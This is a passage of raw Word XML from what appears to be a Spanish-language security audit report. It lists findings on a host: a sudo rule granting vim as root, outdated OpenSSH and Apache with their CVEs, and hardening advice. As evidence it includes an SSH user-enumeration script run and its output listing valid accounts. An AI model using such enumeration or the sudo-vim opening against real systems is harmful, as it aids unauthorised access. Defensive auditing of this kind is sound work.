              <w:t>5. Implementar monitoreo de comandos sudo ejecutados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D2033A0" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="007C4494" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="076983CE" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="007C4494" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC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Configuración actual (vulnerable):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75F220EB" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t>jperez ALL=(root) NOPASSWD: /usr/bin/vim</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64E5C238" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC"/>
          <w:p w14:paraId="5D58B915" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="007C4494" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC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Configuración correcta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC13332" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>jperez ALL=(root) /usr/bin/systemctl restart apache2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D5D377" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t># Solo permitir comandos específicos necesarios</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="231E4EF4" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1EC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7984B846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B4AB4D1" w14:textId="77777777" w:rsidR="00BF36EE" w:rsidRDefault="00BF36EE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55C7AA8B" w14:textId="77777777" w:rsidR="00BF36EE" w:rsidRDefault="00BF36EE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F0E7DCE" w14:textId="77777777" w:rsidR="00BF36EE" w:rsidRDefault="00BF36EE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9B7D86F" w14:textId="77777777" w:rsidR="00BF36EE" w:rsidRDefault="00BF36EE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69D7C7B" w14:textId="77777777" w:rsidR="00BF36EE" w:rsidRDefault="00BF36EE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DE0153C" w14:textId="77777777" w:rsidR="00BF36EE" w:rsidRDefault="00BF36EE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2AC12CD1" w14:textId="77777777" w:rsidR="00BF36EE" w:rsidRDefault="00BF36EE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A804A3C" w14:textId="77777777" w:rsidR="00BF36EE" w:rsidRDefault="00BF36EE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5F257A66" w14:textId="76AC8FE6" w:rsidR="00BF36EE" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="00BF36EE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BF36EE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>3. VULNERABILIDADES ALTAS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B016FF7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1315390" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF36EE">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF36EE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> VULNERABILIDAD #4:</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF36EE">
              <w:t>OpenSSH versión antigua</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C5F8677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━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07B66431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Puerto: </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF36EE">
              <w:t>22/TCP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B2E60EC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Versión: </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF36EE">
              <w:t>OpenSSH 5.3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D49359F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CVSS: </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF36EE">
              <w:t>7.5 (ALTA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C9AE037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1C987473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1FB82AC8" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00BF36EE" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00BF36EE">
              <w:t>OpenSSH 5.3 contiene múltiples vulnerabilidades conocidas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="774E0DAC" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00BF36EE" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00BF36EE">
              <w:t>que permiten enumeración de usuarios y ataques de timing.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="086F899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9FDC39D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CVEs asociados:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57463780" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A97052">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>- CVE-2016-6210: User enumeration via timing attack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BCBFEB2" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A97052">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>- CVE-2015-5600: MaxAuthTries bypass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BF6BA4C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6355C1F6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Evidencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BFED7BA" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A97052">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$ ssh -V</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AA6E0D9" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A97052">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F0CBC6C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06A5620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Prueba de enumeración:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11AED534" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>$ python ssh_user_enum.py --userList users.txt 192.168.1.50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B35EEE0" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>[+] Usuario válido encontrado: root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F19F00C" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>[+] Usuario válido encontrado: jperez</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="011AF320" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>[+] Usuario válido encontrado: admin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01EDC249" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>[+] Usuario válido encontrado: mlopez</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19430BB7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C253C5D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Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B8994E9" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>- Enumeración de usuarios válidos del sistema</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68229DFC" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>- Base para ataques de fuerza bruta dirigidos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1313C9C1" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>- Explotación de vulnerabilidades conocidas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="792FB897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6C98400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ecomendación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BD9B350" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>1. Actualizar a OpenSSH 9.0 o superior</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19C0F090" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>2. Deshabilitar autenticación por password (usar solo llaves)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D97864" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>3. Implementar fail2ban para bloquear intentos repetidos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46EC5105" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>4. Cambiar puerto SSH del default 22 a puerto alto</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72ED0B99" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A97052" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A97052">
              <w:t>5. Permitir SSH solo desde IPs específicas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AE2E42C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D581B90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Configuración recomendada (/etc/ssh/sshd_config):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78264A43" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007465F1" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007465F1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Port 2222</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FFBDC35" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007465F1" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007465F1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PermitRootLogin no</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C3BBE70" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007465F1" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007465F1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PasswordAuthentication no</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B0598CC" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007465F1" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007465F1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PubkeyAuthentication yes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70C36FDF" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="006D4D78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D4D78">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AllowUsers jperez@192.168.1.100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14A7ACD5" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="006D4D78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F9E33BA" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="006D4D78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D4D78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73336A4B" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="006D4D78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="55EE5D22" w14:textId="77777777" w:rsidR="007465F1" w:rsidRPr="006D4D78" w:rsidRDefault="007465F1" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F8BE186" w14:textId="77777777" w:rsidR="007465F1" w:rsidRPr="006D4D78" w:rsidRDefault="007465F1" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15473D71" w14:textId="77777777" w:rsidR="007465F1" w:rsidRPr="006D4D78" w:rsidRDefault="007465F1" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C4A5BCF" w14:textId="77777777" w:rsidR="007465F1" w:rsidRPr="006D4D78" w:rsidRDefault="007465F1" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C5E362E" w14:textId="77777777" w:rsidR="007465F1" w:rsidRPr="006D4D78" w:rsidRDefault="007465F1" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="698FAA7A" w14:textId="77777777" w:rsidR="007465F1" w:rsidRPr="006D4D78" w:rsidRDefault="007465F1" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5DD39E05" w14:textId="77777777" w:rsidR="007465F1" w:rsidRPr="006D4D78" w:rsidRDefault="007465F1" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1681A5AD" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="006D4D78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D4D78">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>⚠</w:t>
            </w:r>
            <w:r w:rsidRPr="007465F1">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>️</w:t>
            </w:r>
            <w:r w:rsidRPr="006D4D78">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> VULNERABILIDAD #5:</w:t>
            </w:r>
            <w:r w:rsidRPr="006D4D78">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Apache versión desactualizada</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06BD9D04" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="006D4D78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D4D78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="333D5AA7" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="006D4D78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D4D78">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Puerto: </w:t>
            </w:r>
            <w:r w:rsidRPr="006D4D78">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>80/TCP y 443/TCP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53CB74FC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Versión: </w:t>
            </w:r>
            <w:r w:rsidRPr="007465F1">
              <w:t>Apache 2.2.15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F53C9D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CVSS: </w:t>
            </w:r>
            <w:r w:rsidRPr="007465F1">
              <w:t>7.3 (ALTA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C739607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494F3840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7F2DC171" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007465F1" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007465F1">
              <w:t>Apache 2.2.15 (lanzado en 2010) contiene más de 50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19631639" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007465F1" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007465F1">
              <w:t>vulnerabilidades de seguridad conocidas y documentadas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09583A17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18B92C5F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CVEs críticos asociados:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E7EBD7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- CVE-2017-15710: Out of bounds write</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="664F5AD7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- CVE-2017-9798: Optionsbleed - Uso after free</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D5CCBBE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- CVE-2011-3192: Range header DoS attack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C00DF23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087D1484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Evidencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4188B46A" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C3554">
              <w:t>$ curl -I http://192.168.1.50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="347E23A5" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C3554">
              <w:t>Server: Apache/2.2.15 (CentOS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="662A4250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7E3EDAF0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$ nikto -h 192.168.1.50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C622E42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+ Apache/2.2.15 appears to be outdated</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D958A97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+ OSVDB-877: Vulnerable to CVE-2011-3192</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CF2C349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283A87E2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Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="687BC410" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C3554">
              <w:t>- Denegación de servicio (DoS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F1D8748" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C3554">
              <w:t>- Posible ejecución remota de código</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ADBBD75" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C3554">
              <w:t>- Filtración de memoria del proceso</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B000559" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C3554">
              <w:t>- Exposición de información sensible</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ADA0AFD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9E455B6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ecomendación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77B92418" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C3554">
              <w:t>1. Actualizar a Apache 2.4.58 o superior</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14AAAC06" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C3554">
              <w:t>2. Ocultar versión del servidor en headers HTTP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72962D08" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C3554">
              <w:t>3. Deshabilitar módulos no utilizados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="064A775B" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C3554">
              <w:t>4. Configurar security headers apropiados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D1A3D0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128666E4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Configuración recomendada:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4925E3E9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ServerTokens Prod</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DA54C7E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ServerSignature Off</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5974585C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Header always set X-Content-Type-Options "nosniff"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F6EB26A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Header always set X-Frame-Options "SAMEORIGIN"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34BF630D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Header always set X-XSS-Protection "1; mode=block"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D47BBB2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33F86A91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rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C1CFA6A" w14:textId="77777777" w:rsidR="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7DF65AA6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05DBA190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6CFE3977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500C7F32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4CFC510D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4920AD17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78D0FF06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65B0687D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55022EE0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0ACAF4CE" w14:textId="77777777" w:rsidR="007C3554" w:rsidRDefault="007C3554" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAF1CE6" w14:textId="77777777" w:rsidR="007C3554" w:rsidRPr="007C4494" w:rsidRDefault="007C3554" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5EBFA81F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3554">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>⚠</w:t>
            </w:r>
            <w:r w:rsidRPr="007C3554">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>️</w:t>
            </w:r>
            <w:r w:rsidRPr="007C3554">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> VULNERABILIDAD #6:</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007C3554">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Contraseñas débiles detectadas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79A19183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rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46585024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Usuarios afectados:</w:t>
            </w:r>
            <w:r w:rsidRPr="007C3554">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
